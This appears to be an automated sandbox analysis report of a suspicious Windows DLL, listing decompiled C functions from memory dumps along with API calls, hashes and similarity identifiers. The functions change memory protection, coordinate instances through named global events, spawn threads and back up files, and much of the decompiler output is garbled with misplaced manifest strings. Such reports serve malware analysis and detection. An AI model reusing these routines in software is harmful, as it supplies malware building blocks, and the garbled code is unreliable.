                                                                                                                        • API String ID: 2706961497-0
                                                                                                                        • Opcode ID: 8ea0eaa53ac6174a8e4725aaae0ee8aa92fd42d3c44e1a6386682c972445f0d9
                                                                                                                        • Instruction ID: 6de7b3b9f436ebfc59c6c26f42391e41fc78e96b05a2420a815dc052ffe9dcf1
                                                                                                                        • Opcode Fuzzy Hash: 8ea0eaa53ac6174a8e4725aaae0ee8aa92fd42d3c44e1a6386682c972445f0d9
                                                                                                                        • Instruction Fuzzy Hash: 49F0FE761083519FC705CF58CC92A5A77E4AF9A710B148A5DE0A5C7684D730E414DB23
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33ADE0, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33ADE0(long _a4, long _a8, long _a12, long* _a16) {
				void* _v4;
				long _t13;

				_v4 = _a4;
				_a4 = _a8;
				_t13 = NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16); // executed
				return 0 | _t13 > 0x00000000;
			}





                                                                                                                        0x6f33adee
                                                                                                                        0x6f33adf7
                                                                                                                        0x6f33ae07
                                                                                                                        0x6f33ae16

                                                                                                                        APIs
                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 6F33AE07
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706961497-0
                                                                                                                        • Opcode ID: 679404aeb4e3949b46648c3ef56b2a84e3e871c2377f931929366847370fdef1
                                                                                                                        • Instruction ID: b78477e4b6319e3045174737d7de5677868566ed5ca31fd5eddb96b3805b58a4
                                                                                                                        • Opcode Fuzzy Hash: 679404aeb4e3949b46648c3ef56b2a84e3e871c2377f931929366847370fdef1
                                                                                                                        • Instruction Fuzzy Hash: B9E0BFB620C342AF8748CF58D951C5BB3E8ABC8720F10CA1DB1BAC3690D730D8088B22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3378B0, Relevance: 56.2, APIs: 25, Strings: 7, Instructions: 223sleepstringthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 80%
                                                                                                                        			E6F3378B0() {
				CHAR* _t23;
				char* _t24;
				CHAR* _t26;
				void* _t29;
				intOrPtr _t36;
				CHAR* _t40;
				char _t45;
				char _t51;
				void* _t52;
				void* _t55;
				int _t56;
				int _t57;
				CHAR* _t60;
				intOrPtr _t62;
				char* _t68;
				CHAR* _t71;
				intOrPtr _t76;
				intOrPtr _t81;
				CHAR* _t82;
				void* _t87;
				void* _t89;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t112;

				_t60 =  *(_t93 + 0x320);
				if(_t60 == 0) {
					L20:
					_t23 =  *(_t93 + 0x320);
					_push(_t60);
					_push(_t23);
					_push( *((intOrPtr*)(_t93 + 0x31c)));
					M6F340594();
					return _t23;
				} else {
					_t24 = M6F340570; // 0x783f38
					if(StrCmpNIA(_t60, _t24, 0xa) == 0) {
						L4:
						_t26 = M6F34057C; // 0x784250
						if(lstrcmpiA(_t60, _t26) == 0) {
							if(M6F340514 > 0) {
								do {
									Sleep(0x3e8);
									_t56 = M6F340514; // 0x0
									_t57 = _t56 - 1;
									M6F340514 = _t57;
								} while (_t57 > 0);
							}
							if(M6F3404B8 != 0) {
								_t68 = M6F340530; // 0x997378
								wsprintfA(_t93 + 0x11c, "\"%s\"", _t68);
								_t51 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
								_push(_t51);
								_push(_t93 + 0x128);
								_t52 = E6F3329D0();
								_t93 = _t93 + 0x14;
								if(_t52 != 0) {
									_t89 = 0;
									while(1) {
										_t81 = M6F340544; // 0x1
										wsprintfA(_t93 + 0x1c, "%s%c%d", _t60, 0x45, _t81);
										_t93 = _t93 + 0x14;
										_t55 = OpenEventA(2, 0, _t93 + 0x10);
										if(_t55 != 0) {
											break;
										}
										Sleep(0x3e8); // executed
										_t89 = _t89 + 1;
										if(_t89 < 0xa) {
											continue;
										}
										goto L12;
									}
									_push(_t55); // executed
									L19:
									FindCloseChangeNotification(); // executed
									ExitProcess(0); // executed
								}
							}
							L12:
							_t92 = 0;
							while(1) {
								_t112 = M6F340544; // 0x1
								wsprintfA(_t93 + 0x10, "%s%c%d", _t60, 0x45, 0 | _t112 == 0x00000000);
								_t93 = _t93 + 0x14;
								_t87 = OpenEventA(2, 0, _t93 + 0x10);
								if(_t87 == 0) {
									break;
								}
								_push(_t87);
								if(M6F340544 == 0) {
									goto L19;
								}
								SetEvent();
								CloseHandle(_t87);
								Sleep(0x3e8);
								_t92 = _t92 + 1;
								if(_t92 < 0x3c) {
									continue;
								}
								break;
							}
							_push(0xc);
							_push(0x6f34046c);
							L6F33C2EE();
							_t76 = M6F340544; // 0x1
							wsprintfA(_t93 + 0x1c, "%s%c%d", _t60, 0x45, _t76);
							_t95 = _t93 + 0x14;
							 *0x6f34046c = CreateEventA( *(_t93 + 0x338), 1, 0, _t95 + 0x10);
							_t36 = M6F34057C; // 0x784250
							wsprintfA(_t95 + 0x1c, "%s%s%c", "Global\\", _t36, 0x4b);
							_t96 = _t95 + 0x14;
							 *0x6f340470 = CreateEventA(0, 1, 0, _t96 + 0x10);
							E6F332170(_t38, 6);
							_t40 = M6F34057C; // 0x784250
							wsprintfA(_t96 + 0x24, "%s%s%c", "Global\\", _t40, 0x52);
							_t97 = _t96 + 0x1c;
							 *0x6f340474 = CreateEventA(0, 1, 0, _t97 + 0x10);
							E6F332170(_t42, 6);
							M6F340510 = CreateThread(0, 0, E6F335240, 0, 0, 0);
							_t45 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
							E6F332DF0(_t45, ".bak");
							_t93 = _t97 + 0x10;
						}
						_t62 = M6F340544; // 0x1
						wsprintfA(_t93 + 0x1c, "%s%c%d", _t60, 0x48, _t62);
						_t29 = _t93 + 0x24;
						_push(_t29);
						_push( *((intOrPtr*)(_t93 + 0x33c)));
						_push( *(_t93 + 0x338));
						M6F340594();
						return _t29;
					} else {
						_t71 = M6F340574; // 0x784294
						if(lstrcmpiA(_t60, _t71) == 0) {
							goto L4;
						} else {
							_t82 = M6F340578; // 0x798f80
							if(lstrcmpiA(_t60, _t82) != 0) {
								goto L20;
							} else {
								goto L4;
							}
						}
					}
				}
			}






























                                                                                                                        0x6f3378b7
                                                                                                                        0x6f3378c1
                                                                                                                        0x6f337b4e
                                                                                                                        0x6f337b4e
                                                                                                                        0x6f337b5c
                                                                                                                        0x6f337b5d
                                                                                                                        0x6f337b5e
                                                                                                                        0x6f337b5f
                                                                                                                        0x6f337b6d
                                                                                                                        0x6f3378c7
                                                                                                                        0x6f3378c7
                                                                                                                        0x6f3378de
                                                                                                                        0x6f337900
                                                                                                                        0x6f337900
                                                                                                                        0x6f337913
                                                                                                                        0x6f337920
                                                                                                                        0x6f337922
                                                                                                                        0x6f337927
                                                                                                                        0x6f33792d
                                                                                                                        0x6f337932
                                                                                                                        0x6f337933
                                                                                                                        0x6f337938
                                                                                                                        0x6f337922
                                                                                                                        0x6f337943
                                                                                                                        0x6f337945
                                                                                                                        0x6f337959
                                                                                                                        0x6f33795b
                                                                                                                        0x6f337960
                                                                                                                        0x6f337968
                                                                                                                        0x6f337969
                                                                                                                        0x6f33796e
                                                                                                                        0x6f337973
                                                                                                                        0x6f337975
                                                                                                                        0x6f337977
                                                                                                                        0x6f337977
                                                                                                                        0x6f33798b
                                                                                                                        0x6f33798d
                                                                                                                        0x6f337999
                                                                                                                        0x6f3379a1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3379ac
                                                                                                                        0x6f3379b2
                                                                                                                        0x6f3379b6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3379b6
                                                                                                                        0x6f337b3f
                                                                                                                        0x6f337b40
                                                                                                                        0x6f337b40
                                                                                                                        0x6f337b48
                                                                                                                        0x6f337b48
                                                                                                                        0x6f337973
                                                                                                                        0x6f3379b8
                                                                                                                        0x6f3379b8
                                                                                                                        0x6f3379c0
                                                                                                                        0x6f3379c2
                                                                                                                        0x6f3379d9
                                                                                                                        0x6f3379db
                                                                                                                        0x6f3379ed
                                                                                                                        0x6f3379f1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3379fa
                                                                                                                        0x6f3379fb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337a01
                                                                                                                        0x6f337a08
                                                                                                                        0x6f337a13
                                                                                                                        0x6f337a19
                                                                                                                        0x6f337a1d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337a1d
                                                                                                                        0x6f337a1f
                                                                                                                        0x6f337a21
                                                                                                                        0x6f337a26
                                                                                                                        0x6f337a2b
                                                                                                                        0x6f337a3f
                                                                                                                        0x6f337a4e
                                                                                                                        0x6f337a5f
                                                                                                                        0x6f337a64
                                                                                                                        0x6f337a79
                                                                                                                        0x6f337a7b
                                                                                                                        0x6f337a8e
                                                                                                                        0x6f337a93
                                                                                                                        0x6f337a98
                                                                                                                        0x6f337aaf
                                                                                                                        0x6f337ab1
                                                                                                                        0x6f337ac4
                                                                                                                        0x6f337ac9
                                                                                                                        0x6f337ae6
                                                                                                                        0x6f337aeb
                                                                                                                        0x6f337af6
                                                                                                                        0x6f337afb
                                                                                                                        0x6f337afb
                                                                                                                        0x6f337afe
                                                                                                                        0x6f337b12
                                                                                                                        0x6f337b25
                                                                                                                        0x6f337b29
                                                                                                                        0x6f337b2a
                                                                                                                        0x6f337b2b
                                                                                                                        0x6f337b2c
                                                                                                                        0x6f337b3c
                                                                                                                        0x6f3378e0
                                                                                                                        0x6f3378e0
                                                                                                                        0x6f3378ec
                                                                                                                        0x00000000
                                                                                                                        0x6f3378ee
                                                                                                                        0x6f3378ee
                                                                                                                        0x6f3378fa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3378fa
                                                                                                                        0x6f3378ec
                                                                                                                        0x6f3378de

                                                                                                                        APIs
                                                                                                                        • StrCmpNIA.SHLWAPI(?,00783F38,0000000A), ref: 6F3378D0
                                                                                                                        • lstrcmpiA.KERNEL32(?,00784294), ref: 6F3378E8
                                                                                                                        • lstrcmpiA.KERNEL32(?,00798F80), ref: 6F3378F6
                                                                                                                        • lstrcmpiA.KERNEL32(?,00784250), ref: 6F337909
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F337927
                                                                                                                        • wsprintfA.USER32 ref: 6F337959
                                                                                                                        • wsprintfA.USER32 ref: 6F33798B
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F337999
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F3379AC
                                                                                                                        • wsprintfA.USER32 ref: 6F3379D9
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F3379E7
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6F337A01
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F337A08
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F337A13
                                                                                                                        • RtlZeroMemory.NTDLL(6F34046C,0000000C), ref: 6F337A26
                                                                                                                        • wsprintfA.USER32 ref: 6F337A3F
                                                                                                                        • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 6F337A5B
                                                                                                                        • wsprintfA.USER32 ref: 6F337A79
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6F337A89
                                                                                                                        • wsprintfA.USER32 ref: 6F337AAF
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6F337ABF
                                                                                                                        • CreateThread.KERNEL32 ref: 6F337AE0
                                                                                                                        • wsprintfA.USER32 ref: 6F337B12
                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 6F337B40
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F337B48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$Event$Create$Sleeplstrcmpi$CloseOpen$ChangeExitFindHandleMemoryNotificationProcessThreadZero
                                                                                                                        • String ID: "%s"$%s%c%d$%s%s%c$.bak$8?x$Global\$PBx
                                                                                                                        • API String ID: 2835795260-1469005943
                                                                                                                        • Opcode ID: 6836e5531d8b0a8fe9399ffeacc6e3ed9f17350f47f84309346f365f210dd502
                                                                                                                        • Instruction ID: a6b6b7b4af4bb5f110e3aea0af5fc70feeb22d42f8c1c554d19a052ca8d20c7c
                                                                                                                        • Opcode Fuzzy Hash: 6836e5531d8b0a8fe9399ffeacc6e3ed9f17350f47f84309346f365f210dd502
                                                                                                                        • Instruction Fuzzy Hash: 0471F3B3E08B99AFE720EB64CC85FAB37ADEB99710F00050DF61596180DB71E5188B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33BBBE, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 124sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 56%
                                                                                                                        			E6F33BBBE(intOrPtr _a4, long _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t16;
				long _t20;
				void* _t22;
				long _t24;
				void* _t26;
				long _t36;
				signed int _t38;
				void* _t39;
				char _t43;

				if(_a8 != 0) {
					__eflags = _a8 - 1;
					if(_a8 != 1) {
						L33:
						return 1;
					}
					_t24 =  *( *[fs:0x18] + 4);
					_a8 = 0;
					_push(0);
					while(1) {
						_t12 = InterlockedCompareExchange(0x6f340964, _t24, ??);
						__eflags = _t12;
						if(_t12 == 0) {
							break;
						}
						__eflags = _t12 - _t24;
						if(_t12 == _t24) {
							_a8 = 1;
							L11:
							_t13 =  *0x6f340960; // 0x0
							_t36 = 2;
							__eflags = _t13;
							if(_t13 == 0) {
								 *0x6f340960 = 1; // executed
								_t14 = E6F33BB78(0x6f33d47c, 0x6f33d484); // executed
								__eflags = _t14;
								if(_t14 != 0) {
									L3:
									return 0;
								}
								_push(0x6f33d478);
								_push(0x6f33d474);
								L6F33C0B0();
								 *0x6f340960 = _t36;
								L15:
								__eflags = _a8;
								if(_a8 == 0) {
									InterlockedExchange(0x6f340964, 0);
								}
								__eflags =  *0x6f340974; // 0x0
								if(__eflags != 0) {
									_push(0x6f340974);
									_t16 = E6F33C044(0, _t36, 0x6f340964, __eflags);
									__eflags = _t16;
									if(_t16 != 0) {
										 *0x6f340974(_a4, _t36, _a12);
									}
								}
								"mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" + 1;
								goto L33;
							}
							_push(0x1f);
							L6F33C0B6();
							goto L15;
						}
						Sleep(0x3e8);
						_push(0);
					}
					goto L11;
				}
				_t43 = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
				if(_t43 <= 0) {
					goto L3;
				}
				"mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" - 1;
				_push(0);
				while(InterlockedCompareExchange(0x6f340964, 1, ??) != 0) {
					Sleep(0x3e8);
					_push(0);
				}
				_t20 =  *0x6f340960; // 0x0
				if(_t20 == 2) {
					_t26 =  *0x6f34096c; // 0x0
					__eflags = _t26;
					if(_t26 == 0) {
						L32:
						 *0x6f340960 = 0;
						InterlockedExchange(0x6f340964, 0);
						goto L33;
					}
					_t38 =  *0x6f340968; // 0x0
					_t39 = _t38 + 0xfffffffc;
					while(1) {
						__eflags = _t39 - _t26;
						if(_t39 < _t26) {
							break;
						}
						_t22 =  *_t39;
						__eflags = _t22;
						if(_t22 != 0) {
							 *_t22();
						}
						_t39 = _t39 - 4;
						__eflags = _t39;
					}
					free(_t26);
					 *0x6f340968 =  *0x6f340968 & 0x00000000;
					 *0x6f34096c =  *0x6f34096c & 0x00000000;
					__eflags =  *0x6f34096c;
					goto L32;
				}
				_push(0x1f);
				L6F33C0B6();
				goto L33;
			}



















                                                                                                                        0x6f33bbcb
                                                                                                                        0x6f33bbf3
                                                                                                                        0x6f33bbf7
                                                                                                                        0x6f33bd3b
                                                                                                                        0x00000000
                                                                                                                        0x6f33bd3d
                                                                                                                        0x6f33bc04
                                                                                                                        0x6f33bc0d
                                                                                                                        0x6f33bc10
                                                                                                                        0x6f33bc29
                                                                                                                        0x6f33bc2b
                                                                                                                        0x6f33bc2d
                                                                                                                        0x6f33bc2f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33bc18
                                                                                                                        0x6f33bc1a
                                                                                                                        0x6f33bc33
                                                                                                                        0x6f33bc3a
                                                                                                                        0x6f33bc3a
                                                                                                                        0x6f33bc41
                                                                                                                        0x6f33bc42
                                                                                                                        0x6f33bc44
                                                                                                                        0x6f33bc59
                                                                                                                        0x6f33bc63
                                                                                                                        0x6f33bc6a
                                                                                                                        0x6f33bc6c
                                                                                                                        0x6f33bbec
                                                                                                                        0x00000000
                                                                                                                        0x6f33bbec
                                                                                                                        0x6f33bc72
                                                                                                                        0x6f33bc77
                                                                                                                        0x6f33bc7c
                                                                                                                        0x6f33bc82
                                                                                                                        0x6f33bc88
                                                                                                                        0x6f33bc8b
                                                                                                                        0x6f33bc8e
                                                                                                                        0x6f33bc92
                                                                                                                        0x6f33bc92
                                                                                                                        0x6f33bc98
                                                                                                                        0x6f33bc9e
                                                                                                                        0x6f33bca0
                                                                                                                        0x6f33bca5
                                                                                                                        0x6f33bcab
                                                                                                                        0x6f33bcad
                                                                                                                        0x6f33bcb6
                                                                                                                        0x6f33bcb6
                                                                                                                        0x6f33bcad
                                                                                                                        0x6f33bcbc
                                                                                                                        0x00000000
                                                                                                                        0x6f33bcbc
                                                                                                                        0x6f33bc46
                                                                                                                        0x6f33bc48
                                                                                                                        0x00000000
                                                                                                                        0x6f33bc48
                                                                                                                        0x6f33bc21
                                                                                                                        0x6f33bc27
                                                                                                                        0x6f33bc27
                                                                                                                        0x00000000
                                                                                                                        0x6f33bc31
                                                                                                                        0x6f33bbcd
                                                                                                                        0x6f33bbd3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33bbd5
                                                                                                                        0x6f33bbe1
                                                                                                                        0x6f33bcd1
                                                                                                                        0x6f33bcc9
                                                                                                                        0x6f33bccf
                                                                                                                        0x6f33bccf
                                                                                                                        0x6f33bcda
                                                                                                                        0x6f33bce2
                                                                                                                        0x6f33bcee
                                                                                                                        0x6f33bcf4
                                                                                                                        0x6f33bcf6
                                                                                                                        0x6f33bd28
                                                                                                                        0x6f33bd2b
                                                                                                                        0x6f33bd35
                                                                                                                        0x00000000
                                                                                                                        0x6f33bd35
                                                                                                                        0x6f33bcf8
                                                                                                                        0x6f33bcfe
                                                                                                                        0x6f33bd0e
                                                                                                                        0x6f33bd0e
                                                                                                                        0x6f33bd10
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33bd03
                                                                                                                        0x6f33bd05
                                                                                                                        0x6f33bd07
                                                                                                                        0x6f33bd09
                                                                                                                        0x6f33bd09
                                                                                                                        0x6f33bd0b
                                                                                                                        0x6f33bd0b
                                                                                                                        0x6f33bd0b
                                                                                                                        0x6f33bd13
                                                                                                                        0x6f33bd19
                                                                                                                        0x6f33bd20
                                                                                                                        0x6f33bd20
                                                                                                                        0x00000000
                                                                                                                        0x6f33bd27
                                                                                                                        0x6f33bce4
                                                                                                                        0x6f33bce6
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • InterlockedCompareExchange.KERNEL32(6F340964,?,00000000), ref: 6F33BC2B
                                                                                                                        • _amsg_exit.MSVCRT ref: 6F33BC48
                                                                                                                        • InterlockedExchange.KERNEL32(6F340964,00000000), ref: 6F33BC92
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F33BCC9
                                                                                                                        • InterlockedCompareExchange.KERNEL32(6F340964,00000001,00000000), ref: 6F33BCD4
                                                                                                                        • _amsg_exit.MSVCRT ref: 6F33BCE6
                                                                                                                        • free.MSVCRT(00000000), ref: 6F33BD13
                                                                                                                        • InterlockedExchange.KERNEL32(6F340964,00000000), ref: 6F33BD35
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlocked$Compare_amsg_exit$Sleepfree
                                                                                                                        • String ID: d4o$d4o
                                                                                                                        • API String ID: 1670123637-3031744194
                                                                                                                        • Opcode ID: 0a3efa0dfdfdf4a21f909cbdd09916f0f29e6f10b98879d45571159f0939605d
                                                                                                                        • Instruction ID: 7b5427e9f727e28c60f6dd4a89875de89a6ae219444777c7c72b2acd756cb66a
                                                                                                                        • Opcode Fuzzy Hash: 0a3efa0dfdfdf4a21f909cbdd09916f0f29e6f10b98879d45571159f0939605d
                                                                                                                        • Instruction Fuzzy Hash: 9E41E6B3A45AE5EBEB20EF648D80B5A33ADAB52375F00452EF904DD1A1CF35A4518B31
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F337C40, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 114filestringCOMMON
                                                                                                                        Download Yara Rule
